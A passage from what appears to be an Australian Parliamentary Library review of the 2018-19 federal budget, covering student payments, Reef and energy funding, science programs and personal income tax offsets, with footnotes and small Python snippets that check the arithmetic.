⢠implement new travel arrangements for secondary students receiving Fares Allowance with increased trips and greater flexibility for students travelling to or from locations other than home and school
⢠provide more frequent payments to boarding providers to support students who move to a new school or boarding arrangement and encourage providers to ensure continued attendance66
⢠streamline the ABSTUDY approval process for secondary school scholarships
⢠no longer apply the maintenance (child support) income test to some ABSTUDY awards. 67
Most of the changes will not require legislation as ABSTUDY is administered through policy guidelines approved by the Minister for Social Services. The maintenance income test changes require legislation.
62. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 94-95, 170-171. 63. Department of Human Services (DHS), ‘ABSTUDY’, DHS website, last updated 7 May 2018. 64. Department of Social Services (DSS), ABSTUDY Policy Manual, DSS, Canberra, 1 May 2018, p. 6. 65. Ibid., pp. 6-7. 66. 67. DSS, Student measures, factsheet, DSS website, May 2018, pp. 1-2; DHS, 50 years of ABSTUDY — strengthening ABSTUDY for
secondary students, factsheet, DHS, May 2018, pp. 1-4.
Access to Youth Allowance for rural students
Currently, a person can be assessed as independent for Youth Allowance purposes through self-support if they:
⢠over a 14 month period since leaving secondary school, earn 75 per cent or more of Wage Level A of the National Training Wage Schedule included in a modern award (for someone who finished school in 2016 this would be equivalent to $24,042) or
⢠work at least 15 hours a week for at least two years since leaving secondary school. 68.69.70 However, the report of the Halsey Review did not raise the income limit as a matter of concern nor did it recommend amending the limit.71
The measure will allow more regional students from families with high incomes to qualify for Youth Allowance. The measure will cost $53.9 million over four years from 2018-19 and will require legislation.
Limiting student payments to HELP-approved courses.72
The new limits for students in higher education build on a 2017-18 budget measure which limited access to student payments for vocational education and training (VET) students to those studying courses approved for VET student loans.73 Affected student payments are Youth Allowance, Austudy, ABSTUDY and the Pensioner Education Supplement.
68. DSS, ‘3.2.5.80 YA & DSP - Self-supporting through Paid Employment’, Guide to social security law, DSS website, last reviewed 7 May 2018. 69. J Gillard (Minister for Education), Government delivers on Youth Allowance, media release, 16 March 2010. 70. Australian Government, op. cit., p. 94. 71. J Halsey, Independent review into regional, rural and remote education: final report, Department of Education and Training,
2018.
72. C Porter (Minister for Social Services), Improving outcomes for students through a stronger student payments system, media release, 16 October 2017. 73. Australian Government, Budget measures: budget paper no. 2: 2017-18, p. 144.
The measure has already been implemented via a legislative instrument which commenced on 1 January 2018.75 The Government estimates that up to 2,000 students will be affected by the changes.76 Student payment recipients studying at non-HELP approved providers were protected from the measure for the duration of their current course.
74. Tertiary Education Quality and Standards Agency (TEQSA), ‘Search the National Register’, TEQSA website, 2017; Australian Government, ‘Providers that offer Commonwealth assistance’, StudyAssist website. 75. Student Assistance (Education Institutions and Courses) Amendment Determination 2017 (No. 3). 76. Porter, op. cit.
Environment
Bill McCormick
Great Barrier Reef 2050 Partnership Program
The Reef was the stand-out environmental item in this Budget, although parts of the package were announced beforehand. The Government has committed $535.8 million over five years from 2017-18 to accelerate the delivery of the Reef 2050 Plan.77 In January 2018 the Government announced $57.9 million (contained in additional Budget Estimates of February 2018) to provide:
⢠$6.0 million to the Australian Institute of Marine Science and CSIRO to scope and design a research and development (R&D) program for coral reef restoration.
⢠$10.4 million to accelerate the control of crown-of-thorns starfish (COTS) by increasing the number of vessels targeting COTS from three to eight.
⢠$36.6 million to further reduce polluted water entering the Reef.
⢠$4.9 million to increase the number of field officers to improve compliance and provide an early warning of coral bleaching.78
In April 2018 the Government announced a $443.3 million Reef Trust partnership with the Great Barrier Reef Foundation (with money administered through the Department of Environment) to tackle COTS, reduce pollution flowing into the Reef and mitigate the impacts of climate change.79 The funding will be:
⢠$201.0 million to support farming practices that improve water quality flowing into the Reef.
⢠$100.0 million to support R&D on reef restoration, reef resilience and adaptation.
⢠$58.0 million to expand the control of COTS.
⢠$45.0 million to increase community engagement, such as Indigenous traditional knowledge for sea country management, coastal clean-up days and awareness-raising.
⢠$40.0 million to enhance reef health monitoring and reporting to facilitate better management.80
While the initial $57.9 million is to be spent over the next 18 months, there is little information about the period over which the rest of the funds will be spent.81 The Great Barrier Reef Marine Park Authority said that it will receive an additional $42.7 million for its joint field management program over the next six years.82
Interested parties have welcomed the additional funding for the Reef, but some consider the funds insufficient to protect it, and they criticised the Government for not providing additional
77. The budget figures have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018. 78.. 79.. 80. Ibid.
81. M Turnbull, M Cash and J Frydenberg, op. cit. 82. Great Barrier Reef Marine Park Authority, $500 million funding “game changer” for the Great Barrier Reef, media release, 29 April 2018.
money for actions to mitigate climate change itself rather than just to mitigate the impacts.83 The federal Department of the Environment and Energy stated that ‘climate change is the most significant threat to the Great Barrier Reef’.84 The chair of the Reef 2050 Advisory Committee,
Penny Wensley, said that both global warming and cyclones had contributed to the Reef's ill health and that funding was still not enough, although it was more than the committee had hoped for.85
Enhancing Australia’s Biosecurity System
The 2017 Intergovernmental Agreement on Biosecurity Review stated that the erosion of biosecurity budgets is hampering the efforts of biosecurity agencies, and that funding needs to be more sufficient, more sustainable and better directed.86.87.88 The levy represents one per cent of the current cost of importing a container.89 It would appear the Government has decided not to implement the recommended levy on aircraft containers.
Per- and Poly-Fluorinated Alkyl Substances (PFAS)
83.].
84. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.6: Environment and Energy Portfolio, p. 56. 85. L Rebgetz and L Gartry, ‘Great Barrier Reef to get $500m to tackle pollution and breed more resilient coral’, ABC News, 29 April 2018. 86. W Craik, D Palmer and R Sheldrake, Priorities for Australia’s biosecurity system: An independent review of the capacity of the
national biosecurity system and its underpinning Intergovernmental Agreement, Canberra 2017, pp. 1-2. 87. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.1: Agriculture and Water Resources Portfolio, p. 20. 88. Department of Agriculture and Water Resources (DAWR), ‘Biosecurity import levy’, DAWR website. 89. Ibid.
The Government will provide $34.1 million over five years from 2017-18 for research into the remediation of PFAS contamination through the establishment of the $13 million PFAS Remediation Research Program and for the Department of the Environment and Energy.90
There is debate about the health effects of PFAS due to the limited evidence presently available. The US Environmental Protection Agency states that ‘there is evidence that exposure to PFAS can lead to adverse health outcomes in humans’.91.92 In 2017, the Department of Health released daily guidance values for PFAS in drinking water.93
90. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 81. 91. United States Environmental Protection Agency (EPA), ‘Basic information on PFAS’, EPA website. 92. Department of Health, Expert Health Panel for PFAS: Summary, April 2018. 93. Department of Health (DoH), ‘Health-based guidance values for PFAS for use investigations in Australia’, DoH website.
Energy
Dr Emily Hanna
Energy is a significant issue for parliament, with discussion since the last Budget focusing on the reliability and security of the electricity system as well as the inclusion of renewable sources into our energy mix. Significantly, since the last Budget, the Independent Review into the Future
Security of the National Electricity Market - Blueprint for the Future (the Finkel Review) has been published and the National Energy Guarantee (NEG) introduced.94 The states and Commonwealth have been in dispute over levels of renewable energy that should be included in our energy supply, and the Council of Australian Governments (COAG) Energy Council has not reached agreement on the NEG.95
This Budget has two main energy measures. These relate to the acquisition of Snowy Hydro Limited and further funding of $41.5 million over six years from 2018-19 to broaden the ‘Powering Forward’ initiative.96 The latter, which was introduced in the 2017-18 Mid-Year Economic and Financial Outlook, aims to deliver ‘more affordable, reliable and sustainable energy’.97
Snowy Hydro Acquisition
Snowy Hydro Limited is an operational power company, which was jointly owned by the governments of New South Wales (NSW), Victoria, and the Commonwealth, with share allocations of 58%, 29% and 13% respectively. It features ‘16 power stations with a combined generation capacity of 5,500 megawatts, including the Snowy Mountains Hydro Electricity Scheme, and … more than one million retail customers’.98 The Australian Government will soon become the sole shareholder, due to an agreement reached with the two states to transfer their shareholdings to the Commonwealth in July 2018.99 In return, NSW and Victoria will receive $4.2 billion and $2.1 billion respectively in funds for infrastructure.100

This arrangement appears as a new capital appropriation worth $6.1 billion for the Department of the Environment and Energy (DEE), paid for in 2017-18 using ‘capital appropriation and interim dividends payable from Snowy Hydro Limited in respect of their profits for the half year period to 31 December 2017’.101 This purchase was reported in The Australian in March as being ‘excluded from the budget bottom line’ with the asset ‘classified as a government business, “off the books”, similar to the Western Sydney Airport and NBN Co’.102 The report claims that, nevertheless, this will ‘add to the nation’s debt, with the government increasing its borrowings to fund the multi-billion dollar deal’.
After the transfer of shares in July this year, all future dividends from Snowy Hydro Limited will go to the Australian Government, and therefore the forward estimates show the acquisition creating revenue for the Commonwealth of $1.1 billion over four years from 2018-19.103 This is an increase
94. A Finkel, K Moses, C Munro, T Effeney and M O’Kane, Independent Review into the Future Security of the National Electricity Market - Blueprint for the Future (the Finkel Review), Commonwealth of Australia, 2017; M Turnbull (Prime Minister) and J Frydenberg (Minister for the Environment and Energy), National energy guarantee to deliver affordable, reliable electricity, media release, 17 October 2017.
95. COAG Energy Council, Meeting Communique, 20 April 2018. 96. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Portfolio Budget Statements 2018-19: Budget Related Paper No. 1.6: Environment and Energy Portfolio, pp. 20-21, 23.
97. Australian Government, Budget Measures: Budget Paper No. 2: 2018-19, pp. 99, 201-202; Australian Government, Mid-Year Economic and Fiscal Outlook 2017-18, p. 150. 98. Australian Government, Portfolio Budget Statements 2018-19: Budget Related Paper No. 1.6: Environment and Energy Portfolio, p. 7. 99. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., p. 7. 100. M Turnbull (Prime Minister), S Morrison (Treasurer) and J Frydenberg (Minister for the Environment and Energy), Historic
Snowy Deal, media release, 2 March 2018. 101. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., p. 87. 102. G Chambers, ‘States to reap $6bn in Snowy buyout [Turnbull's $6bn Snowy buyout]’, The Australian, 2 March 2018, pp. 1, 7. 103. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., p. 76.
in earnings from the shares of $941.1 million over the four years.104 In addition, the Commonwealth will no longer need to compensate Victoria and NSW for their relative shares of income tax paid by Snowy Hydro Limited, reducing Department of the Treasury expenses by $225 million over three years from 2019-20 ($75 million per year).105
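The Treasury expense reduction is the quoted annual amount multiplied over the three-year period; a quick check of the figures as cited (in $ millions):

```python
# Treasury expense reduction from no longer compensating NSW and Victoria
# for their shares of Snowy Hydro's income tax; figures in $ millions.
annual_reduction = 75.0  # per year, from 2019-20
years = 3

total_reduction = annual_reduction * years
print(f"Total reduction: ${total_reduction:.0f} million over {years} years")  # $225 million over 3 years
```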
The Budget includes no further funding specifically for Snowy Hydro or the Snowy 2.0 scheme (estimated in the Snowy 2.0 feasibility study to have a base cost of $3.8-4.5 billion).106 However, this is likely due to the Government reporting that the feasibility study found ‘Snowy Hydro can finance the project itself using retained earnings and borrowing’.107
‘Powering Forward’ program
‘Powering Forward - delivering more affordable, reliable and sustainable energy’ is a measure designed to ‘support long-term energy affordability, security and governance’. Funding of $11.7 million over five years from 2017-18 is provided ‘to support recommendations from the Finkel Review and the Energy Security Board’, including establishing the Government’s current energy and emissions reduction policy, the NEG, and ‘developing a distributed energy register to improve and lower the costs of system security and grid management, and allow consumers to receive a benefit from their demand reduction’.108

In addition, the measure aims to improve the functionality of the gas market, with funding of ‘$2.5 million over two years from 2018-19 to improve gas pipeline regulations, and to improve the national gas law and rules’. The development and implementation of the NEG will also continue with funding of $7.5 million for the Council of Australian Governments Energy Council’s ‘agreed work program’ over two years from 2018-19.109 Episodic assessments of national energy security and resilience are also funded, with $12.8 million over six years from 2018-19 as well as a further $4.9 million every three years from 2024-25 (with no end date given for this commitment).110 These assessments will include the recently announced investigation into Australia's domestic liquid fuel security.111
As well as coming under DEE’s Energy program (program 4.1), the Powering Forward measure is listed as part of DEE’s programs 2.1 and 2.2, Reducing Australia’s Greenhouse Gas Emissions and Adapting to Climate Change, respectively.112 This appears to be the only place in the Budget where new funds related to climate change are provided:
⢠$0.9 million over two years ‘to undertake modelling for a long-term whole-of-economy emissions reduction strategy as recommended by … the Finkel Review’113 and
⢠$6.1 million over three years (from 2018-19) ‘to improve climate change information for the energy sector’.114
The Treasurer used the Budget speech to reaffirm the Government’s commitment to an emissions reduction target of 26-28 per cent on 2005 levels by 2030. He stated:
104. Budget Measures: Budget Paper No. 2: 2018-19, op. cit., p. 202. 105. Ibid. 106. Snowy 2.0 Short Feasibility Study Report, Snowy Hydro Limited 2017, p. 25.
107. M Turnbull (Prime Minister) and J Frydenberg (Minister for the Environment and Energy), Green Light for Snowy Hydro 2.0, media release, 21 December 2017. 108. The Finkel Review, op. cit.; Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., p. 23. 109. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., p. 23. 110. Ibid. 111. J Frydenberg (Minister for the Environment and Energy), Budget delivers for energy, reef and environment, media release,
8 May 2018. 112. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., pp. 60-61. 113. Ibid., p. 20. 114. Ibid., p. 21.
‘…we will not adopt the 50 per cent renewable energy target demanded by the Opposition’ and ‘[a]ll energy sources and technologies should support themselves without taxpayer subsidies. The current subsidy scheme will be phased out from 2020’. 115
This is reflected in the absence of extra funding for the Emissions Reduction Fund (ERF), which has approximately $265 million left.116 The Clean Energy Finance Corporation, which received its final year of legislatively prescribed funding of $2 billion in 2017-18 under the Clean Energy Finance Corporation Act 2012, will receive $530 million in 2018-19 from DEE—only about one quarter of the previous year's payment.117
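The ‘about one quarter’ comparison for the CEFC payment can be checked directly from the quoted figures (in $ millions):

```python
# CEFC payments in $ millions: final legislated annual payment vs the 2018-19 figure.
payment_2017_18 = 2000.0  # last legislatively prescribed annual payment
payment_2018_19 = 530.0   # payment from DEE in 2018-19

ratio = payment_2018_19 / payment_2017_18
print(f"2018-19 payment is {ratio:.1%} of the prior year's")  # 26.5%
```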
Commentary
The majority of commentary around the energy-related parts of the Budget relates to the absence of new funding, and concerns that the lack of extra funds for the ERF may make it harder to achieve the national emissions reduction target.118 The chief executive of the Carbon Market Institute, Peter Castellas, is reported as saying that without more ERF-funded abatement, ‘the need for the Safeguard Mechanism and the National Energy Guarantee to do the heavy lifting of emissions reduction’ is elevated.119 The Climate Council stated that ‘Budget 2018 … fell short on new funding to embrace the rollout of clean, affordable and reliable renewable energy and storage technology’.120 Environmental and climate groups were also generally disappointed in the lack of funding for climate change.121
115. Scott Morrison (Treasurer), Budget speech 2018-19, p. 82. 116. Department of the Environment and Energy (DEE), ‘Emissions Reduction Fund Update’, DEE website. 117. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., pp. 27, 161; Clean Energy Finance Corporation Act 2012, section 46.
118. ‘No Budget top-up for Emissions Reduction Fund’, Footprint, 8 May 2018. 119. Ibid. 120. Climate Council, ‘Budget blow: No cash to tackle climate change’, 9 May 2018, Climate Council website. 121. For example, Australian Conservation Foundation (ACF), ‘Budget 2018-19: Investment in a healthy environment cut to bare
bones, while fossil fuel subsidies continue’, 8 May 2018, ACF website and Climate Council, op. cit.
Science and technology
Dr Hunter Laidlaw
A number of budget measures affect the science and technology sector and these have generally been met with stakeholder enthusiasm. Support for many of the main programs is relatively steady or modestly improved, while a number of new initiatives are funded—perhaps most notably the establishment of a domestic space agency. Many of these initiatives fall under the Australian Technology and Science Growth Plan; this will also be discussed under the ‘Innovation Incentives’ topic.
Space agency
The Budget provides $26.0 million over four years to establish a national space agency to oversee and coordinate domestic space activities.122 An additional $15.0 million over three years from 2019-20 is also allocated to an International Space Investment initiative to generate opportunities for strategic space projects; however, the design of this initiative has not yet been finalised.123 These expenditures are designed to boost Australia’s involvement in the space sector and to help break further into the global space market. This funding secures the commitment made by the Government in September 2017 to establish a space agency.124 A review of Australia’s space industry capabilities commenced in 2017 and the report was delivered to the Government on 29 March 2018; it has not yet been released.125 A number of states and territories have expressed interest in hosting the agency and additional details are eagerly anticipated.126
Science and research funding
Funding for Commonwealth research agencies appears to be relatively stable across the sector, although the overall picture will become clearer when the Science, Research and Innovation Budget Tables are released later in the year. The Commonwealth Scientific and Industrial Research Organisation (CSIRO) received a 5% increase in funds.127 The Australian Research Council (ARC) received higher than expected funding for key programs including the Discovery program (2.5% increase) and Linkage program (2.7% increase) compared with the 0.2% increase indicated in last year’s forward estimates.128 There are no unexpected changes to total appropriation for the ARC or the National Health and Medical Research Council (NHMRC) compared with previous forward estimates. A Bill to amend and update the funding caps for the ARC was introduced into Parliament on 10 May 2018.129
The Antarctic Gateway Partnership will be extended and an Antarctic Science Collaboration Initiative will be established with $35.7 million over four years through the ARC; however, this will be met using existing funds from the ARC and the Department of Industry, Innovation and Science.
122. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018. 123. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.13A: Jobs and Innovation Portfolio, p. 44. 124. M Cash (Acting Minister for Industry, Innovation and Science), Turnbull Government to establish national space agency, media
release, 25 September 2017. 125. Department of Industry, Innovation and Science (DIIS), ‘Review of Australia’s Space Industry Capability’, DIIS website. 126. A Wicht, ‘Budget 2018: space agency details still scant - but GPS and satellite imagery funded’, The Conversation, 8 May
2018; SBS, ‘Australia will explore a new frontier with the establishment of a national space agency’, SBS News, 9 May 2018. 127. Increase calculated using 2017-18 Estimated Actual total funds from Government compared to 2018-19 Estimate from Portfolio budget statements 2018-19, Jobs and Innovation Portfolio, op. cit., p. 115. 128. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.5: Education and Training Portfolio,
pp. 120-121; Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.5: Education and Training Portfolio, p. 149. 129. Parliament of Australia, ‘Australian Research Council Amendment Bill 2018 homepage’, Australian Parliament website.
Approximately $4.5 million over four years has also been allocated to encourage more women into science, technology, engineering and mathematics (STEM) education and careers.
Medical Research Future Fund (MRFF)
Accumulation of capital in the Medical Research Future Fund (MRFF) remains on track for the fund to reach $20 billion by 2020-21. Budget papers indicate a 2017-18 balance of $7.1 billion, with the fund to increase to $9.5 billion next financial year.130 Disbursements are still expected to rise each year. Two broad announcements for the MRFF were in the Budget: investments in health and medical research, and an Industry Growth Plan for the sector. The Growth Plan aims to ‘improve health outcomes and develop Australia as a global destination for medical sector jobs, research and clinical trials’ by providing $1.3 billion over ten years. Specific initiatives include $500.0 million over ten years for precision medicine and genomics (the Genomics Health Futures Mission) and $248.0 million for an expanded clinical trials program. Research programs were also announced that will receive $275.4 million from the MRFF, including $75.0 million over four years to extend the Rapid Applied Research Translation program.
In contrast to most other science grant funding mechanisms (such as those administered through the ARC and NHMRC), the government determines the programs and funding amounts to be disbursed from the MRFF, following advice provided by the Australian Medical Research Advisory Board and taking into consideration the Australian Medical Research and Innovation Strategy (set every five years) and the Australian Medical Research and Innovation Priorities (set every two years).131 The sector is looking forward to more details on the competitive processes to be used when allocating these research funds.132
Technology
Besides funding for the space agency, the Budget also provides support for space-related technologies, particularly GPS and satellite imagery. Improvements to GPS through more comprehensive positioning, navigation and timing (PNT) data received significant funds: $160.9 million over four years for PNT data to the resolution of ten centimetres across all of Australia, and $64.0 million over four years to the resolution of three to five centimetres in near real-time for regional and metropolitan areas with mobile phone coverage. Additional ongoing funding is also provided from 2022-23 (total of $50.9 million across both initiatives). More reliable and standardised satellite imagery data will also be developed with $36.9 million over three years from 2019-20 (and $12.8 million ongoing) through Digital Earth Australia.
Advanced computing technology received a boost with $70.0 million to assist with upgrades of supercomputing infrastructure at the Pawsey Supercomputing Centre in Western Australia, to help the Centre maintain its position in the Top500 global supercomputer list and attract international research. Australia’s capabilities in Artificial Intelligence (AI) and Machine Learning will also be strengthened through investment of $29.9 million over four years. The funds will support projects through the Cooperative Research Centres Program, additional postgraduate scholarships and school-level programs, and additional planning for AI technology including a national ethics framework.
130. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.7: Finance Portfolio, pp. 32. 131. Department of Health (DoH), ‘How does MRFF funding work?’, DoH website; DoH, ‘How is the MRFF governed?’, DoH website. 132. Association of Australian Medical Research Institutes (AAMRI), $2 billion MRFF investment secures Australia’s future as
medical research leader, media release, 8 May 2018.
Research infrastructure
The National Collaborative Research Infrastructure Strategy (NCRIS) will be expanded and receive an additional $393.3 million over five years from 2017-18. The NCRIS provides partial funding for national research infrastructure projects that are intended to generate maximum benefit to the research sector and broader community. This brings total funding under the Research Infrastructure Investment Plan to $4.1 billion over 12 years ($1.9 billion of this total is announced in the Budget). A 2015 review proposed that $6.6 billion ($3.7 billion from government) was required to support long term investment in national research infrastructure.133 The National Research Infrastructure Roadmap, completed in 2016, identifies nine focus areas as priority sectors for investment.134 The Roadmap specifically identified the Pawsey Supercomputing Centre (noted above) as an immediate priority.135
Capital works within CSIRO have been allocated $341.5 million over nine years; this will be met from existing resources and the planned disposal of part of CSIRO’s property portfolio.136 Property, plant and equipment sales are expected to generate $141.4 million over the forward estimates.137 The only specifically noted capital works relate to maintaining regulatory requirements at the Australian Animal Health Laboratory in Geelong, Victoria, the highest level biosecurity containment laboratory in the country.
Reaction The science and technology measures announced in the Budget have received a relatively enthusiastic reception from sector representatives.138 This contrasts with previous budgets that have been met with a mixed reaction.139 Establishment of a space agency has been welcomed by both industry lobby groups and the broader scientific community, although some have questioned whether the level of funding for the new agency will be sufficient to boost the local industry into the highly competitive world market.140
133. Research Infrastructure Review, Final report, September 2015, DET website.
134. Australian Government, 2016 National Research Infrastructure Roadmap, February 2017.
135. Ibid., p. 43.
136. Portfolio budget statements 2018-19, Jobs and Innovation Portfolio, op. cit., p. 116; Budget measures: budget paper no. 2: 2018-19, op. cit., p. 205.
137. Portfolio budget statements 2018-19, Jobs and Innovation Portfolio, op. cit., p. 131.
138. Association of Australian Medical Research Institutes (AAMRI), 2018-19 Federal Budget - what’s in it for medical research?, media release, 8 May 2018; Australian Academy of Science, Good outcomes for science in Budget 2018, media release, 8 May 2018; Research Australia, Budget 2018-19: Budget analysis, media release, 8 May 2018; Science & Technology Australia, STEM a standout winner in this year’s budget, media release, 8 May 2018; Universities Australia, Budget boosts for research infrastructure & regions a downpayment on future prosperity, media release, 8 May 2018.
139. Science & Technology Australia, From the 2017/18 Federal budget lockup, media release, 9 May 2017; D Brett, ‘Science and research funding’, Budget review 2015-16, Research paper series, 2014-15, Parliamentary Library, Canberra, 2015; K Loynes, ‘Science and innovation’, Budget review 2016-17, Research paper series, 2015-16, Parliamentary Library, Canberra, 2016; A St John, ‘Science, research and innovation’, Budget review 2017-18, Research paper series, 2016-17, Parliamentary Library, Canberra, 2017.
140. Space Industry Association of Australia (SIAA), Space funding in the 2018 budget, media release, 9 May 2018; D Sadler, ‘Just $26m for new space agency’, InnovationAus.com website, 8 May 2018.
Personal income tax cuts and the Medicare levy Phillip Hawkins
The Treasurer, Scott Morrison, announced the Government’s Personal Income Tax Plan (PITP) in the 2018-19 Budget.141 The PITP reduces personal income taxes over the next seven years through a combination of changes to tax offsets for low and middle income earners and changes in income tax thresholds. The changes will be implemented over three steps, commencing in 2018-19, 2022-23 and 2024-25. The 2018-19 changes are targeted at low and middle income earners, with the changes in 2022-23 and 2024-25 applying to individuals on higher taxable incomes.
The Government also announced in the Budget that it will not proceed with its proposal to increase the Medicare levy from 2 per cent to 2.5 per cent to fund the National Disability Insurance Scheme (NDIS).
Impact of the PITP Figure 1 indicates the dollar value of total tax reductions provided under each stage of the PITP by taxable income. This demonstrates:
⢠the changes commencing in the 2018-19 income year are beneficial across all taxable incomes. However, the benefit is larger for those individuals with taxable income below $125,333
⢠the changes commencing in the 2022-23 income year primarily provide additional tax reductions to individuals with taxable incomes over $90,000
⢠the changes commencing in the 2024-25 income year primarily provide an additional tax reduction to individuals with taxable income over $120,000
Figure 1: Combined impact of PITP changes (tax reduction per annum ($) by taxable income in 2018-19, 2022-23 and 2024-25)
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018.
141. Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 33-34.
Why is the Government taking this approach? While the approach taken by the Government adds some complexity to the personal income tax system, utilising tax offsets to provide most of the income tax reductions in 2018-19 means that the initial tax cuts can be targeted to low and middle income earners. Tax offsets, as described further below, can be limited to taxpayers at particular taxable income levels and phased out for higher income earners.
In contrast, changes in income tax thresholds cannot be targeted in the same way. Australia’s progressive tax system applies higher marginal tax rates to income above particular income thresholds (zero for the first $18,200, 19 per cent between $18,200 and $37,000 and so on). This means that lifting an income tax threshold reduces the amount of tax paid by anyone with taxable income above that threshold. For example, increasing the tax threshold for the 32.5 per cent marginal tax rate from $87,000 to $90,000 benefits all individuals with taxable income over $87,000, not just those earning between $87,000 and $90,000. Anyone with taxable income above $87,000 would pay 32.5 per cent on any taxable income between $87,000 and $90,000 rather than the current 37 per cent.
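The arithmetic above can be checked with a short sketch. This is illustrative only: it uses the 2017-18 and 2018-19 resident schedules shown at Attachment A, excludes the Medicare levy and all offsets, and the helper name is invented for illustration.

```python
def tax_payable(taxable_income, brackets):
    """Progressive tax: brackets is [(threshold, marginal_rate), ...] sorted
    ascending; each rate applies to income above its threshold up to the next."""
    tax = 0.0
    for i, (threshold, rate) in enumerate(brackets):
        upper = brackets[i + 1][0] if i + 1 < len(brackets) else float("inf")
        if taxable_income > threshold:
            tax += (min(taxable_income, upper) - threshold) * rate
    return tax

# 2017-18 schedule, and the 2018-19 schedule with the 32.5% ceiling at $90,000
old = [(18200, 0.19), (37000, 0.325), (87000, 0.37), (180000, 0.45)]
new = [(18200, 0.19), (37000, 0.325), (90000, 0.37), (180000, 0.45)]

# Everyone above $90,000 gets the same saving: $3,000 x (37% - 32.5%) = $135
for income in (88000, 90000, 150000):
    print(income, round(tax_payable(income, old) - tax_payable(income, new), 2))
# -> 88000 45.0, then 90000 135.0, then 150000 135.0
```

As the output shows, the saving phases in between $87,000 and $90,000 and is flat at $135 for every taxable income above that.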
Tax Offsets
142. Tax offsets may be non-refundable or refundable. A non-refundable tax offset can only reduce the amount of tax that someone pays to zero in a financial year; a refundable tax offset can reduce the tax liability to an amount less than zero, which results in a refund.
What is a tax offset? In order to understand the Government’s PITP it is important to understand tax offsets and how they differ from tax deductions.
Both deductions and offsets are ultimately used to reduce a taxpayer’s tax liability, but they operate differently:
⢠deductions, such as expenses incurred in earning assessable income, are applied at the start of the tax return calculation to reduce an individual’s taxable income (the base to which the person’s marginal tax rate applies)
⢠in contrast, tax offsets are applied at the end of the tax return calculation to directly reduce an individual’s tax liability.
The following is a simplified example (it ignores the Medicare levy):
An individual has assessable income of $100,000, work-related deductions of $30,000 and non-refundable tax offsets of $10,000.142
⢠the person’s taxable income is $70,000 ($100,000 less $30,000 of deductions)
⢠the tax amount on a taxable income of $70,000 (before offsets are applied) would be $14,297 based on 2016-17 marginal tax rates
⢠after the $10,000 tax offset is applied the individual’s tax liability for the year would be $4,297
⢠if the taxpayer was entitled to a tax offset of $15,000, then their tax liability would be zero (if the offset is a non-refundable one) or $703 (if the offset were a refundable one ($14,297 - $15,000))
Given that the Australian Tax Office (ATO) collects personal income tax throughout the year (income tax withholding), and deductions and offsets are effectively applied when the ATO processes a tax return (on assessment), an individual may be entitled to a refund of tax paid throughout the year.
Low and middle income tax offset (LAMITO) In the 2018-19 income year a new Low and Middle Income Tax Offset (LAMITO) will be introduced. The LAMITO is a non-refundable tax offset of up to $530 per annum for resident taxpayers with a taxable income of up to $125,333. It will be applied as a lump-sum amount on assessment. The LAMITO will commence in the 2018-19 income tax year and will be in place for 4 years until 2021-22 (at which time other tax changes will effectively ‘lock-in’ these tax cuts).
LAMITO will provide the following tax benefit:143
⢠individuals earning up to $37,000 will receive a LAMITO amount of up to $200 per annum 144
⢠individuals earning more than $37,000 but less than $48,000 will have their LAMITO amount increased from $200, by 3 cents in the dollar, to a maximum rate of $530
⢠individuals earning between $48,000 and $90,000 will receive the maximum value of LAMITO of $530
⢠individuals earning more than $90,000 will have their LAMITO amount reduced by $1.5 cents in the dollar until it phases out entirely for incomes of $125,333 and above.
LAMITO is provided in addition to the existing Low-Income Tax Offset (LITO) which provides an offset of up to $445 for individuals earning less than $37,000, and reduces by 1.5 cents in the dollar for every dollar over $37,000 until it phases out entirely for incomes over $66,667. Figure 2 illustrates the combined amount of LAMITO and LITO available for the 2018-19, 2019-20, 2020-21 and 2021-22 income years.
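The LAMITO and LITO taper rules described above can be written out directly. The sketch below is illustrative only: it applies the stated rates and ignores the cap at the person's actual tax liability (both offsets are non-refundable, per footnote 144).

```python
def lamito(income):
    """Low and Middle Income Tax Offset, 2018-19 to 2021-22."""
    if income <= 37000:
        return 200.0
    if income <= 48000:
        return 200.0 + 0.03 * (income - 37000)   # builds to $530 at $48,000
    if income <= 90000:
        return 530.0
    # tapers at 1.5 cents in the dollar, fully phased out above $125,333
    return max(0.0, 530.0 - 0.015 * (income - 90000))

def lito(income):
    """Existing Low Income Tax Offset: $445, gone above $66,667."""
    return max(0.0, 445.0 - max(0.0, 0.015 * (income - 37000)))

for income in (30000, 48000, 70000, 90000, 126000):
    print(income, round(lamito(income) + lito(income), 2))
# -> 645.0, 810.0, 530.0, 530.0 and 0.0 respectively
```

The combined offset peaks at $810 around $48,000 (where LITO has only partially tapered), matching the shape of Figure 2.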
Figure 2. LAMITO and LITO for the 2018-19, 2019-20, 2020-21 and 2021-22 income years
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018 and ATO website.
143. Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018, p. 4. 144. Because LAMITO and LITO are non-refundable, the maximum amount of LAMITO and LITO that can be claimed will be limited to the person’s tax liability prior to applying the offset.
Low-income tax offset In the 2022-23 income year the LAMITO will be rolled into the existing LITO and the LITO will be increased from $445 to $645 per year. The new LITO, as illustrated in Figure 3, will provide the following tax offset amount:145
⢠individuals earning up to $37,000 will receive a LITO amount of up to $645 (equal to the combined amount of LITO and LAMITO in previous years)
